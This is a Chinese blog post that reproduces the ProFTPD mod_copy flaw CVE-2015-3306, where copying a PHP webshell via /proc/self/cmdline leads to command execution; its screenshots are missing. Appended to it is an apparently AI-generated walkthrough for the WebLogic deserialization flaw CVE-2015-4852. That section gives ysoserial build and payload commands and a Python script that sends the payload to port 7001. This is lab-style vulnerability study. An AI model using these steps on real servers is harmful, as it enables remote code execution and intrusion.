cve-2015-3306复现

本文介绍了CVE-2015-3306漏洞,该漏洞存在于ProFTPD 1.3.5版本中的mod_copy模块。远程攻击者可通过特定命令读取和写入任意文件,甚至执行远程代码。文章详细记录了漏洞的复现过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Cve-2015-3306

背景:
ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。
任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdline将PHP有效负载复制到网站目录,可以实现PHP远程代码执行。

复现:
启动服务
在这里插入图片描述
执行poc
在这里插入图片描述
挂了个小马上去
在这里插入图片描述
从流量中看是可以通过post传入命令
在这里插入图片描述
执行whoami测试
在这里插入图片描述
执行id测试
在这里插入图片描述

分析:
通过使用/ proc / self / cmdline将PHP的payload复制到网站目录
在这里插入图片描述
传参写入小马
在这里插入图片描述

### 关于 CVE-2015-4852 的概述 CVE-2015-4852 是 Oracle WebLogic Server 中的一个反序列化漏洞,攻击者可以通过发送特制的数据包来触发该漏洞并实现远程代码执行。此漏洞的根本原因在于 Java 序列化的不安全使用[^4]。 --- ### 复现 CVE-2015-4852 漏洞的条件与方法 #### 条件准备 为了成功复现 CVE-2015-4852 漏洞,需满足以下前提条件: 1. **目标环境配置** 需要安装受影响版本的 Oracle WebLogic Server(例如 10.3.6 或其他易受攻击的版本)。具体受影响范围可参考官方公告或相关文档[^4]。 2. **网络可达性** 攻击者的机器能够通过网络访问到目标服务器上的 T3 协议端口,默认为 `7001`。 3. **工具准备** 使用 ysoserial 工具生成恶意的序列化对象文件。ysoserial 是一种用于创建 Java 反序列化有效载荷的工具,支持多种 gadget 链以适应不同的场景和依赖库[^5]。 --- #### 实际操作过程 以下是基于上述条件的具体实施步骤: 1. **下载并编译 ysoserial** 获取最新版的 ysoserial 源码,并按照说明完成构建工作。命令如下所示: ```bash git clone https://github.com/ropgadget/ysoserial.git cd ysoserial mvn clean compile assembly:single ``` 2. **生成 payload 文件** 利用 ysoserial 创建针对特定类型的反序列化漏洞的有效负载。假设我们希望弹回 shell,则可以运行下面这条指令: ```bash java -jar target/ysoserial.jar CommonsCollections1 "ping -c 5 192.168.x.y" > exploit.bin ``` 这里选择了 `CommonsCollections1` 类型作为 gadgets chain;实际应用中可能需要尝试不同选项直至找到适合当前服务端环境的最佳组合[^5]。 3. **利用 Python 脚本投递 payload** 编写简单的客户端程序模拟向存在缺陷的服务发起请求行为。示例脚本如下: ```python import socket host = 'target_host_ip' port = 7001 with open('exploit.bin', 'rb') as f: data = f.read() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host, port)) s.send(data) response = s.recv(1024) print(response.decode()) finally: s.close() ``` 4. **验证效果** 如果一切正常,在目标主机上应该观察到由所指定命令产生的相应活动迹象——比如 ICMP 请求被发出或者新的进程启动等等情况发生。 --- ### 安全建议 尽管研究此类高危漏洞有助于提升防护意识和技术能力,但在真实世界环境中切勿滥用这些技术手段去危害他人利益。始终遵循道德准则以及法律法规框架下开展学习实践活动才是正道所在! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值